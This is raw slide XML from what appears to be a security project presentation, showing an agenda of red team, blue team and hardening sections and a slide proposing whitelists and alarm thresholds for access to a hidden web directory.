            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="255" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="676080"/>
            <a:ext cx="9143640" cy="364320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="91440" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>This document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="257" name="Google Shape;1027;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352520" y="1378800"/>
            <a:ext cx="7516800" cy="621000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="258" name="Google Shape;1028;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="1378800"/>
            <a:ext cx="776880" cy="621000"/>
            <a:chOff x="457200" y="1378800"/>
            <a:chExt cx="776880" cy="621000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="259" name="Google Shape;1029;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="1378800"/>
              <a:ext cx="695160" cy="621000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="a9b7c0"/>
            </a:solid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3000" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Thin"/>
                  <a:ea typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="260" name="Google Shape;1030;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969840" y="1607400"/>
              <a:ext cx="339840" cy="188280"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="a9b7c0"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="261" name="Google Shape;1031;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="2228760"/>
            <a:ext cx="776880" cy="621000"/>
            <a:chOff x="457200" y="2228760"/>
            <a:chExt cx="776880" cy="621000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="262" name="Google Shape;1032;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="2228760"/>
              <a:ext cx="695160" cy="621000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solid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3000" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Thin"/>
                  <a:ea typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="263" name="Google Shape;1033;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969840" y="2457360"/>
              <a:ext cx="339840" cy="188280"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="cc0000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="264" name="Google Shape;1034;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3073680"/>
            <a:ext cx="776880" cy="621000"/>
            <a:chOff x="457200" y="3073680"/>
            <a:chExt cx="776880" cy="621000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="265" name="Google Shape;1035;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3073680"/>
              <a:ext cx="695160" cy="621000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="3d85c6"/>
            </a:solid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3000" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Thin"/>
                  <a:ea typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="266" name="Google Shape;1036;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969840" y="3302280"/>
              <a:ext cx="339840" cy="188280"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="3d85c6"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="267" name="Google Shape;1037;p55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="457200" y="3923640"/>
            <a:ext cx="776880" cy="621000"/>
            <a:chOff x="457200" y="3923640"/>
            <a:chExt cx="776880" cy="621000"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="268" name="Google Shape;1038;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="457200" y="3923640"/>
              <a:ext cx="695160" cy="621000"/>
            </a:xfrm>
            <a:prstGeom prst="roundRect">
              <a:avLst>
                <a:gd name="adj" fmla="val 16667"/>
              </a:avLst>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solid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3000" spc="-1" strike="noStrike">
                  <a:solidFill>
                    <a:srgbClr val="ffffff"/>
                  </a:solidFill>
                  <a:latin typeface="Roboto Thin"/>
                  <a:ea typeface="Roboto Thin"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
                <a:latin typeface="Arial"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="269" name="Google Shape;1039;p55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="969840" y="4152240"/>
              <a:ext cx="339840" cy="188280"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartExtract">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:ln w="0">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:style>
            <a:lnRef idx="0"/>
            <a:fillRef idx="0"/>
            <a:effectRef idx="0"/>
            <a:fontRef idx="minor"/>
          </p:style>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="270" name="Google Shape;1040;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12600" y="1378800"/>
            <a:ext cx="9168120" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="1554480" rIns="457200" tIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Network Topology</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="271" name="Google Shape;1041;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352520" y="2231280"/>
            <a:ext cx="7516800" cy="621000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="272" name="Google Shape;1042;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352520" y="3073680"/>
            <a:ext cx="7516800" cy="621000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="273" name="Google Shape;1043;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1352520" y="3918960"/>
            <a:ext cx="7516800" cy="621000"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="f3f3f3"/>
          </a:solidFill>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="274" name="Google Shape;1044;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12600" y="2233440"/>
            <a:ext cx="9168120" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="1554480" rIns="457200" tIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Red Team</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>: Security Assessment</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="275" name="Google Shape;1045;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="3076200"/>
            <a:ext cx="9168120" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="1554480" rIns="457200" tIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>: Log Analysis and Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Google Shape;1046;p55"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="3918960"/>
            <a:ext cx="9168120" cy="606600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
        <p:txBody>
          <a:bodyPr lIns="1554480" rIns="457200" tIns="0" bIns="0" anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>: Proposed Alarms and Mitigation Strategies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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Mitigation: Finding the Request for the Hidden Directory</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="413" name="PlaceHolder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="4916520"/>
            <a:ext cx="7971480" cy="226440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="274320" rIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="414" name="PlaceHolder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="1602360"/>
            <a:ext cx="4298040" cy="3301560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Hidden directories should only be accessed by authorized users and machines. A white list of authorized IP addresses and/or MAC addresses should be implemented on the server, and an alarm set for any machine that tries to access the hidden directories that are not on the white list. The threshold for this alarm to trigger should be set to 0 as there should be no machines that should access the hidden directories. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>In some instances where access is needed with new unauthorized machines, there should be a extra validation of authentication for the new machine. An alarm for multiple failed attempts on any username/ login or authentication methods should be set to notify the system early on of a possible unauthorized access attempt on seeing hidden directories. This threshold should be set very low, or 1, so that there is only 1 attempt at successful login with a new machine before an alarm is triggered. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1000" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="415" name="PlaceHolder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4466880" y="1604880"/>
            <a:ext cx="4298040" cy="3301560"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="457200" tIns="0" bIns="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Hidden directories for the public webserver should not be hosted on the server in the first place. Removing such folders to a different secure server should eliminate any requests made to look for or access hidden directories. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="12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r>
              <a:rPr b="0" lang="en" sz="1200" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
              </a:rPr>
              <a:t>Should hidden directories be needed in this situation, a white list filter of authorized IP address and machines that could access the hidden directories should be implemented. Any unauthorized machine should have access blocked completely until an administer or authorized machine grants access by adding it to the whitelist. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1200" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pP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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12240" y="0"/>
            <a:ext cx="9168120" cy="533520"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="0">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="457200" rIns="274320" tIns="182880" bIns="91440" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
